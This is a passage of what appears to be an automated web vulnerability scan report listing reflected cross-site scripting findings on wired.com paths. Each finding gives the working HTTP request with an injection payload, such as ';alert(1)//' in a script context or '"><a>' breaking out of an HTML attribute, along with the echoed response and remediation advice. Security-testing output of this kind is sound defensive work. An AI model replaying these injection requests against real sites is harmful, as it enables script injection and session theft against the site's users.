<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 12dc247;alert(1)//401a89ca126;</script>
...[SNIP]...

1.167. http://www.wired.com/inspiredbyyou/2010/10/peak-everything [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/10/peak-everything

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 99586%3balert(1)//29128e720c6 was submitted in the ibypid parameter. This input was echoed as 99586;alert(1)//29128e720c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/10/peak-everything?ibypid=1399586%3balert(1)//29128e720c6 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:02 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:02 GMT
Date: Sun, 21 Nov 2010 23:14:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 1399586;alert(1)//29128e720c6;</script>
...[SNIP]...

1.168. http://www.wired.com/inspiredbyyou/2010/10/turkeys-and-triumphs [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/10/turkeys-and-triumphs

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8c5cb%3balert(1)//5e37e52b0bb was submitted in the ibypid parameter. This input was echoed as 8c5cb;alert(1)//5e37e52b0bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/10/turkeys-and-triumphs?ibypid=148c5cb%3balert(1)//5e37e52b0bb HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:13:43 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:21:43 GMT
Date: Sun, 21 Nov 2010 23:13:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 148c5cb;alert(1)//5e37e52b0bb;</script>
...[SNIP]...

1.169. http://www.wired.com/inspiredbyyou/2010/11/avoiding-bad-holiday-albums [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/11/avoiding-bad-holiday-albums

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bc9b9%3balert(1)//3b7177fe795 was submitted in the ibypid parameter. This input was echoed as bc9b9;alert(1)//3b7177fe795 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/11/avoiding-bad-holiday-albums?ibypid=15bc9b9%3balert(1)//3b7177fe795 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:13:40 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:21:40 GMT
Date: Sun, 21 Nov 2010 23:13:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 15bc9b9;alert(1)//3b7177fe795;</script>
...[SNIP]...

1.170. http://www.wired.com/medtech [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e89c"><a>d3ad9ae676c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech8e89c"><a>d3ad9ae676c HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29378
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:03 GMT
Date: Mon, 22 Nov 2010 01:11:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech8e89c"><a>d3ad9ae676c">
...[SNIP]...

1.171. http://www.wired.com/medtech/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41041"><a>c86672fee37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech41041"><a>c86672fee37/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29379
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Sun, 21 Nov 2010 20:19:52 GMT
Date: Sun, 21 Nov 2010 20:16:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech41041"><a>c86672fee37">
...[SNIP]...

1.172. http://www.wired.com/medtech/drugs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/drugs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6c78"><a>e49d3eb099e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtechc6c78"><a>e49d3eb099e/drugs HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:38 GMT
Date: Sun, 21 Nov 2010 23:08:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtechc6c78"><a>e49d3eb099e ss_drugs">
...[SNIP]...

1.173. http://www.wired.com/medtech/drugs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/drugs

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c65f1"><a>11d5934ee8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech/drugsc65f1"><a>11d5934ee8b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:08 GMT
Date: Sun, 21 Nov 2010 23:09:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech ss_drugsc65f1"><a>11d5934ee8b">
...[SNIP]...

1.174. http://www.wired.com/medtech/genetics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/genetics

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6e54"><a>33024249170 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtecha6e54"><a>33024249170/genetics HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29399
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:38 GMT
Date: Sun, 21 Nov 2010 23:08:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtecha6e54"><a>33024249170 ss_genetics">
...[SNIP]...

1.175. http://www.wired.com/medtech/genetics [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/genetics

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b5c"><a>80a5cb3973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech/genetics56b5c"><a>80a5cb3973b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29399
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:15 GMT
Date: Sun, 21 Nov 2010 23:09:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech ss_genetics56b5c"><a>80a5cb3973b">
...[SNIP]...

1.176. http://www.wired.com/medtech/health [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/health

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0876"><a>211d7d736ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medteche0876"><a>211d7d736ef/health HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29395
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:41 GMT
Date: Sun, 21 Nov 2010 23:08:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medteche0876"><a>211d7d736ef ss_health">
...[SNIP]...

1.177. http://www.wired.com/medtech/health [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/health

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9f9"><a>5052cbc9d21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech/healthed9f9"><a>5052cbc9d21 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29395
Vary: Accept-Encoding
Cache-Control: max-age=549
Expires: Sun, 21 Nov 2010 23:18:22 GMT
Date: Sun, 21 Nov 2010 23:09:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech ss_healthed9f9"><a>5052cbc9d21">
...[SNIP]...

1.178. http://www.wired.com/medtech/stemcells [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/stemcells

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d1ff"><a>67b5e859397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech7d1ff"><a>67b5e859397/stemcells HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:48 GMT
Date: Sun, 21 Nov 2010 23:08:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech7d1ff"><a>67b5e859397 ss_stemcells">
...[SNIP]...

1.179. http://www.wired.com/medtech/stemcells [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/stemcells

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e76"><a>2f9c85fc36d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech/stemcells32e76"><a>2f9c85fc36d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:21 GMT
Date: Sun, 21 Nov 2010 23:09:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech ss_stemcells32e76"><a>2f9c85fc36d">
...[SNIP]...

1.180. http://www.wired.com/multimedia [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /multimedia

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2cd"><a>0b4232b1240 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /multimediaaf2cd"><a>0b4232b1240 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29268
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:57 GMT
Date: Mon, 22 Nov 2010 01:11:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_multimediaaf2cd"><a>0b4232b1240">
...[SNIP]...

1.181. http://www.wired.com/multimedia/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /multimedia/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1b5"><a>d5da876dbe0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /multimedia3e1b5"><a>d5da876dbe0/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29269
Vary: Accept-Encoding
Cache-Control: max-age=236
Expires: Sun, 21 Nov 2010 20:19:58 GMT
Date: Sun, 21 Nov 2010 20:16:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_multimedia3e1b5"><a>d5da876dbe0">
...[SNIP]...

1.182. http://www.wired.com/news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88eb2"><a>01f8e05d095 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/archive88eb2"><a>01f8e05d095/2010-01/15/javascript-hack-enables-flash-on-iphone HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 22 Nov 2010 01:21:53 GMT
Date: Mon, 22 Nov 2010 01:11:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
